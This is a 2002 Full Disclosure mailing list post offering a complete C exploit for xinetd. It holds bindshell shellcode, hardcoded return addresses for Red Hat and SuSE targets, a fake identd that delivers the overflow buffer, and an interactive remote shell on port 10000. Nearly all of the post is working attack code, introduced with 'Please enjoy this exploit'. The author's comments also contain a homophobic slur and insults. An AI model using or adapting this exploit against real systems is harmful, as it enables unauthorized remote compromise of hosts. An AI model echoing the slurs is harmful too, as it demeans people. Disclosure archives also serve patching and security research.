Full Disclosure mailing list archives
[ElectronicSouls] - xinetd exploit
From: es () hush com
Date: Thu, 28 Nov 2002 23:51:05 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Please enjoy this exploit. # cat Esxinetd-xp.c /* * +++++++++++++++++++++++++++++++++++++++++++++++++ * [ElectronicSouls] - xinetd Exploit - 2k1 * by BrainStorm * ************************************************* * The code uses a single-byte corruption of the fp. * sc_addr_pos is the position, from the beginning * of the writable area, where a pointer to the nop * will be placed. * original code by quitest1 - thx :) * thx to zen-parse, cuz found this sweet bug * ************************************************* * Greetings: 0x7f - XOR Team - IC - raza-mexicana * +++++++++++++++++++++++++++++++++++++++++++++++++ * * Well i stop working on thisone, you can add * new targets in under 1 minute ..so ;) * have fun auditing ..oo00oo poor kiddies what now?? * n0 k-r4d x1n3td 0d4y w4r3z *bo0oho0o* - lmfao * * STILL - KEEP THIS PRIVATE !! - bs 10.2k1 * addition 2002 * oh well this _test_ code got leaked * and those ppl edited the banner so it looked like * i ripped it =/ fuck j00 !@# i just used it as base * of my research and it was never ment to go public ! * so sorry to www.digit-labs.org ! * and fucks again to those lame code wh0rez who even trade * unfinished code or research code :P faggots */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #include <netdb.h> #define MY_PORT 1 #define THEIR_PORT 23 #define IDENTD_PORT 113 #define FIRST_PAD 1009 struct targ { int def; char *descr; unsigned long int retaddr; int sc_addr_pos; }; struct targ target[]= { {0, "- Red Hat 6.2 - xinetd-2.1.8.9pre11-1 ", 0xbffff44b, 985}, {1, "- [Test] Halloween 7.0 - xinetd-2.1.8.9pre10 ", 0xbffff39a, 985}, {2, "- RedHat 6.2 (Zoot) - xinetd 1.14(1) rpm ", 0xbfffb038, 985}, {3, "- SuSe 6.4 - xinetd 1.14(1) rpm ", 0xbffff45b, 985}, {4, "- [Test] Value 4 - xinetd-2.1.8.x? ", 0xbffff3d8, 985}, {5, "- [Test] Value 5 - xinetd-2.1.8.x? ", 0xbffff43b, 985}, {69, NULL, 0} }; char shellcode[] = /* Bindshell at port 10000 */ "\x31\xc0" // xor eax, eax "\x31\xdb" // xor ebx, ebx "\x89\xe5" // mov ebp, esp "\x99" // cdq "\xb0\x66" // mov al, 102 "\x89\x5d\xfc" // mov [ebp-4], ebx "\x43" // inc ebx "\x89\x5d\xf8" // mov [ebp-8], ebx "\x43" // inc ebx "\x89\x5d\xf4" // mov [ebp-12], ebx "\x4b" // dec ebx "\x8d\x4d\xf4" // lea ecx, [ebp-12] "\xcd\x80" // int 80h "\x89\x45\xf4" // mov [ebp-12], eax "\x43" // inc ebx "\x66\x89\x5d\xec" // mov [ebp-20], bx "\x66\xc7\x45\xee\x27\x10" // mov [ebp-18], word 4135 "\x89\x55\xf0" // mov [ebp-16], edx "\x8d\x45\xec" // lea eax, [ebp-20] "\x89\x45\xf8" // mov [ebp-8], eax "\xc6\x45\xfc\x10" // mov [ebp-4], byte 16 "\xb2\x66" // mov dl, 102 "\x89\xd0" // mov eax, ed "\x8d\x4d\xf4" // lea ecx, [ebp-12] "\xcd\x80" // int 80h "\x89\xd0" // mov eax, edx "\xb3\x04" // mov bl, 4 "\xcd\x80" // int 80h "\x43" // inc ebx "\x89\xd0" // mov eax, edx "\x99" // cdq "\x89\x55\xf8" // mov [ebp-8], edx "\x89\x55\xfc" // mov [ebp-4], edx "\xcd\x80" // int 80h "\x31\xc9" // xor ecx, ecx "\x89\xc3" // mov ebx, eax "\xb1\x03" // mov cl, 3 "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf8" // loop -7 "\x52" // push edx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x52" // push edx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\x0b" // mov al, 11 "\xcd\x80"; // int 80h char zbuf[1024], host[512]; int sel = 0, offset = 0; int sockami2(char *host, int my_port, int their_port); void fake_identd(void); void xp_buf(void); static void keep_clz(void) __attribute__ ((destructor)); void shellami(int sock); void usage(char *progname); int main(int argc, char **argv) { int sock, cnt; printf("\n\n [ E l e c t r o n i c S o u l s ] \n"); printf("\n Xinetd Exploit by BrainStorm \n\n"); if(getuid()) { fprintf(stderr, "j00 have to be rewt f00l...\n"); exit(1); } if(argc == 1) usage(argv[0]); host[0] = 0; while((cnt = getopt(argc,argv,"h:t:o:s:")) != EOF) { switch(cnt) { case 'h': strncpy(host, optarg, sizeof(host)); host[sizeof(host)] = '\x00'; break; case 't': sel = atoi(optarg); break; case 'o': offset = atoi(optarg); break; case 's': target[sel].sc_addr_pos = atoi(optarg); break; default: usage(argv[0]); break; } } if(host[0] == 0) usage(argv[0]); printf("[!] Host: %s\n as: %s\n", host, target[sel].descr); target[sel].retaddr += offset; printf("[!] Using: retaddr = %p \n"); printf("[!] sc_addr_pos = %d...\n"); printf("[*] ok\n", target[sel].retaddr, target[sel].sc_addr_pos); printf("[!] Starting fake_identd...\n"); fake_identd(); return; } int sockami2(char *host, int my_port, int their_port) { struct sockaddr_in address; struct sockaddr_in my_addr; struct hostent *hp; int sock; sock = socket(AF_INET, SOCK_STREAM, 0); if(sock == -1) { perror("socket()"); exit(-1); } hp = gethostbyname(host); if(hp == NULL) { perror("gethostbyname()"); exit(-1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(my_port); my_addr.sin_addr.s_addr = INADDR_ANY; bzero(&(my_addr.sin_zero), 8); if(bind(sock, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("bind()"); exit(1); } memset(&address, 0, sizeof(address)); memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length); address.sin_family = AF_INET; address.sin_port = htons(their_port); if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1) { perror("connect()"); exit(-1); } return(sock); } void fake_identd(void) { int sockfd, new_fd, sin_size, rem_port, loc_port, i; char rbuf[1024], sbuf[1024], cif[6], *ptr; struct sockaddr_in my_addr; struct sockaddr_in their_addr; printf("[*] fake_identd forking into background\n"); if (!fork()) { if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(IDENTD_PORT); my_addr.sin_addr.s_addr = INADDR_ANY; bzero(&(my_addr.sin_zero), 8); if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("bind()"); exit(1); } if(listen(sockfd, 1) == -1) { perror("listen()"); exit(1); } while(1) { sin_size = sizeof(struct sockaddr_in); if((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) { perror("accept()"); continue; } memset(rbuf, 0, sizeof(rbuf)); recv(new_fd, rbuf, sizeof(rbuf), 0); ptr = rbuf; i = 0; while(*ptr != ',') { cif[i] = *ptr; *ptr++; i ++; } sscanf(cif, "%d", &rem_port); memset(cif, 0, sizeof(cif)); *ptr++; i = 0; while(*ptr != ' ') { cif[i] = *ptr; *ptr++; i++; } sscanf(cif, "%d", &loc_port); xp_buf(); memset(sbuf, 0, sizeof(sbuf)); sprintf(sbuf, "%d,%d:USERID:%s\r\n", rem_port, loc_port, zbuf); send(new_fd, sbuf, strlen(sbuf), 0); memset(rbuf, 0, sizeof(rbuf)); recv(new_fd, rbuf, sizeof(rbuf), 0); } } return; } void xp_buf(void) { int i, n = 0; memset(zbuf, 0, sizeof(zbuf)); for(i = 0; i < FIRST_PAD; i++) zbuf[i] = '\x69'; memset(zbuf, 0x90, target[sel].sc_addr_pos - 1); for(i = target[sel].sc_addr_pos - strlen(shellcode); i < target[sel].sc_addr_pos; i++) zbuf[i] = shellcode[n++]; zbuf[target[sel].sc_addr_pos + 0] = (u_char) (target[sel].retaddr & 0x000000ff); zbuf[target[sel].sc_addr_pos + 1] = (u_char)((target[sel].retaddr & 0x0000ff00) >> 8); zbuf[target[sel].sc_addr_pos + 2] = (u_char)((target[sel].retaddr & 0x00ff0000) >> 16); zbuf[target[sel].sc_addr_pos + 3] = (u_char)((target[sel].retaddr & 0xff000000) >> 24); return; } void keep_clz(void) { int sock; if(host[0] != 0) { printf("[!] Causing an auth request to our fake_identd\n"); sock = sockami2(host, MY_PORT, THEIR_PORT); printf("[*] Done!\n"); close(sock); printf("[!@#] enjoy the flash ;> ...\n\n"); sleep(1); sock = sockami2(host, 10000, 10000); shellami(sock); } } void shellami(int sock) { int n; char recvbuf[1024], *cmd = "id; uname -a\n"; fd_set rset; send(sock, cmd, strlen(cmd), 0); while (1) { FD_ZERO(&rset); FD_SET(sock, &rset); FD_SET(STDIN_FILENO, &rset); select(sock+1, &rset, NULL, NULL, NULL); if(FD_ISSET(sock, &rset)) { n = read(sock, recvbuf, 1024); if (n <= 0) { printf("[x] Connection closed by foreign host.\n"); exit(0); } recvbuf[n] = 0; printf("%s", recvbuf); } if (FD_ISSET(STDIN_FILENO, &rset)) { n = read(STDIN_FILENO, recvbuf, 1024); if (n > 0) { recvbuf[n] = 0; write(sock, recvbuf, n); } } } return; } void usage(char *progname) { int i = 0; printf("[*] Usage: %s -[h/t/o/s]\n", progname); printf("[*] Options:\n" "[-] -h Hostname\n" "[-] -t Type\n" "[-] -o Offset\n" "[-] -s sc_addr_pos\n\n" "[*] Available types:\n\n"); while(target[i].def != 69) { printf(" %d) %s\n", target[i].def, target[i].descr); i++; } exit(1); } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Nothing beats Rice Crispies." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nHHcMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltssEAnRRYNLFGk5+v 5q0xSYJg+Xzhta9xAJ9uYpUkZ9vWirIvEE5bLivyTXoOng== =XUtq -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - xinetd exploit es (Nov 29)